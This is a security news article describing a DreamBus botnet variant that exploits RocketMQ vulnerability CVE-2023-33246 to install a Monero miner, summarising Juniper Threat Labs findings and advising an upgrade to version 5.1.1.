New DreamBus Malware Variant Exploits RocketMQ Vulnerability to Infect Servers

A recently emerged iteration of the DreamBus botnet malware is capitalizing on a critical remote code execution vulnerability present in RocketMQ servers, thereby compromising various devices.

This exploited vulnerability, identified as CVE-2023-33246, is characterized by a permission verification lapse that affects RocketMQ version 5.1.0 and earlier. The flaw permits attackers to execute remote commands under specific circumstances.

Researchers from Juniper Threat Labs have identified a surge in activity related to DreamBus attacks employing the CVE-2023-33246 vulnerability, with notable occurrences observed in mid-June 2023.

The initial DreamBus assaults that harnessed CVE-2023-33246 were detected by Juniper Threat Labs in early June 2023. These attacks were primarily targeted at RocketMQ’s default 10911 port, along with an additional seven ports.

To ascertain software versions on publicly exposed servers and identify potential exploitable vulnerabilities, the attackers employed the open-source reconnaissance tool “interactsh.”

Additionally, researchers noted that the threat actor used a Tor proxy service to download a malicious bash script named “reketed.” This script evaded detection by antivirus engines on VirusTotal.

The obfuscated “reketed” script operates as a downloader and installer for the DreamBus main module, an ELF file retrieved from a Tor-based site. To minimize the risk of detection, the file is deleted post-execution.

The main DreamBus module incorporates encoded scripts executed through custom UPX packing, effectively bypassing VirusTotal AV scans. These scripts serve various purposes, such as signaling online status to the command and control (C2) server, downloading the XMRig Monero miner, executing additional bash scripts, or fetching new malware versions.

To maintain persistence on compromised systems, DreamBus establishes a system service and a cron job, both scheduled to activate hourly. Lateral spreading mechanisms are also present, utilizing tools like ansible, knife, salt, and pssh, in addition to a scanner module targeting external and internal IP ranges to uncover vulnerabilities.

While the primary focus of the ongoing DreamBus campaign seems to be Monero mining, the modular nature of the malware leaves room for potential expansion of its capabilities in future updates.

Given the potential severity of compromising RocketMQ servers in communication environments, the attackers might potentially exploit sensitive conversation data from breached devices for higher monetization prospects, surpassing the gains from crypto mining using hijacked resources.

To mitigate the impact of the latest DreamBus attacks, administrators of RocketMQ are advised to upgrade to version 5.1.1 or later.

Previous versions of the DreamBus malware have targeted various systems, including Redis, PostgreSQL, Hadoop YARN, Apache Spark, HashiCorp Consul, and SaltStack. Hence, maintaining robust patch management practices across all software products is crucial to effectively counter this evolving threat.